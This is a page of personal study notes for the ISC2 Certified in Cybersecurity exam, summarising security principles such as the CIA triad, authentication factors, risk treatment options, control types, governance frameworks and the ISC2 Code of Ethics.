pirate.moo's gitbook
  • 🏴‍☠️pirate.moo's gitbook
  • WEB
    • OWASP TOP 10
    • Notes
    • Lab Write-Ups
      • SQLi in WHERE clause
  • PENTESTING
    • CHECKLIST
    • REPORTING
    • SCRIPTS
  • EXPLOITATION
    • reverse shells
    • dns/subdomain
    • ssl
    • Handy cmds
    • VULNERABILITIES
      • Log4Shell
      • Dirty Pipe
      • Pwnkit
  • CTF
    • CTF Tools
  • CERTIFICATIONS
    • PNPT
    • CPTS
      • 1. Process
      • 2. Getting Started
      • 3. NMAP
      • 4. Footprinting
        • FTP
        • SNMP
        • SMB
        • NFS
        • MySQL/MSSQL
        • Oracle TNS
    • CPTS Machines
      • Nibbles
    • OSCP
    • ISC2-cc
      • 1. Security Principles
      • 2. Incident Response
      • 3. Access Control
      • 4. Network Security
      • 5. Security Operations
  • MOBILE
    • History
    • Forensics
  • MOOSINT
Powered by GitBook
On this page
  1. CERTIFICATIONS
  2. ISC2-cc

1. Security Principles

Triad:

Permitting authorized access to info/protecting it

A security professional’s obligation is to:

  • Regulate access: Protect data, but allow to authorized individuals

PII: Personally Ident. Info: Any data about someone that could ID them PHI: Protected Health Info: Data regarding one's health Sensitivity: Importance of info; need to protect it because of this

Info used in a way that is complete, accurate, consistent, useful

  1. Info/Data: Data Integrity: Hasn't been altered in an unauthorized way

    • Storage protection: Processing/transit: No: errors, info loss, mods

    • Recorded, used, maintained to ensure completeness

  2. Systems/Processes: Integrity: Maintenance of good configs/function

    • Awareness of current states/condition

    • Documenting/understanding states at certain points

    Baseline: Current state of info/if protected

    • Comparing baselines with states validates integrity

  3. Org: Reliability dictated by laws/regulations

  4. People & Actions

Access to systems and data when users need it

  1. Timely, reliable access; Not 100% of the time; Downtimes exist

  2. Meets requirements of business

Criticality: Degree orgs depend on info NIST SP 800-60 Vol. 1, Rev. 1

Authentication

Process of verifying and proving people are who they say they are

Three common methods:

  1. Something you know: Passwords/passphrases

  2. Something you have: Tokens, memory or smart cards

Token: An object possessed to authenticate identity NISTIR 7711

  1. Something you are: Biometrics, measurable characteristics

Biometrics: Bio characteristics: Fingerprints, hand geometry, voice, eyes

Two types:

  1. SFA: Single-Factor Authentication: One method of authentication

  2. MFA: Multi-Factor Authentication: Two or more methods

    • Knowledge-based: Secret differentiates auth/unauth users

    • PIN: Personal ID Number: Created passwd/secret only you know

    • Vuln to SE, brute-force attacks

Legal: A user can't falsely deny having done an action

  • Example: Paying for an item/signing a receipt

  • Capability to determine whether an action was done

  • Example: Denial: Making purchases online/denying it

  • Important all participants trust online transactions

Right of individuals to control the distribution of their info

  • Legislation/compliance with existing policy

  • Laws define protection

    • GDPR

    • HIPAA

Risk Management

Risk: Measuring the extent an entity is threatened by a potential event:

  1. Adverse impacts, likelihood of occurrence 

Infosec risk: Unauthorized access, use, disclosure, disruption, modification, destruction

Threat actors include:

  • Insiders: deliberate, human error, gross incompetence

  • Outsiders: Planned, opportunistic, discovering vulnerability

  • Formal entities, nonpolitical: Business competitors, cybercriminals

  • Formal entities, political: Terrorists, nation-states, hacktivists

  • Intel & info gatherers: Any of above

Threat Vector: The way a threat actor carries out objectives Vulnerability: Inherent weakness and flaws in systems Likelihood: Considers the probability of a vulnerability being exploited Impact: Measured harm expected from consequences of exposure

Risk Identification: Categorizing, estimating potential for disruption Risk Assessment: Estimating and prioritizing assets

Risk Treatment

Making decisions about the best actions regarding identified, prioritized risk

Attempting to eliminate risk entirely

  1. Stopping operation for some; all activities exposed to a risk

  2. May choose when potential impact is too high; great

Taking no action to reduce risk

  1. Conducting business with the risk without action

  2. Impact or likelihood is negligible, or benefit offsets it

Taking actions to prevent; reduce possibility of risk

  1. Remediation, controls, policies, procedures, standards to minimize

  2. Can't always mitigate, can implement safety measures

Passing risk to another party who will accept the impact

  1. Analyze risk through qualitative/quantitative measure for cause

  2. Risk matrixes help ID priority: Intersection of likelihood, impact

What risks are companies willing to take in respect of rewards?

  • Low tolerance means more investment

Security Controls: Safeguards to CIA  

Hardware: Badge readers, building structures

  1. Controlling, directing, people movement through equipment

  2. Protection, control over entry, parking lots

  3. Supported by technical controls in an overall system

Logical: Controls computers/networks directly implement

  1. Can provide automated protection from misuse

  2. Facilitates detection of violations; supports security requirements

  3. Configuration settings/parameters stored as data, hardware

Managerial: Guidelines aimed at people: Frameworks, constraints, standards for human behavior

Governance Elements/Processes

Detailed steps to complete a task that supports dept/org policies

  • Explicit, repeatable activities needed to accomplish specific task(s) 

Provides guidance to ensure org supports industry standards & regulations. Informed by law(s) and specify what to follow

  • Broad range of issues/ideas: Not detailed: Establishes context

  • Sets strategic direction/priorities

  • Operating with policies/procedures that support regulations/widely accepted best practices

  • Governance policy: Moderate/control decision-making for compliance

Frameworks that introduce policies/procedures in support of regulation

  • ISO: Develops/publishes standards on tech

  • NIST: National Institute of Standards/Tech: US

    • Publishes variety of standards in addition to infosec ones

      • Many requirements for gov agencies

  • IETF: Internet Engineering Task Force: Standards in comm protocols

  • IEEE: Institute of Electrical/Electronics Engineers:

    • Standards for telecom, engineers & similar

Commonly laws. Typically carry financial penalties for noncompliance

  • Can be imposed by gov at national/regional/local level

  • HIPAA: Health Insurance Portability/Accountability Act: 1996:

    • Governs use of PHI in US

    • Violation carries fines/imprisonment for individuals/companies

    • GDPR: General Data Protection Regulation: EU: Control use of PII

ISC2 Code of Conduct

Certification is a privilege. Every ISC2 member is required to commit to fully support the ISC2 Code of Ethics

The safety/welfare of society/the common good, duty to principals, and each other, requires we adhere, to the highest ethical standards of behavior

Members have a duty to the following four entities:

  1. Protect society, common good, public trust/confidence, infrastructure

  2. Act honorably, honestly, justly, responsibly, legally

  3. Provide diligent/competent service

  4. Advance and protect the profession

PreviousISC2-ccNext2. Incident Response

Last updated 1 year ago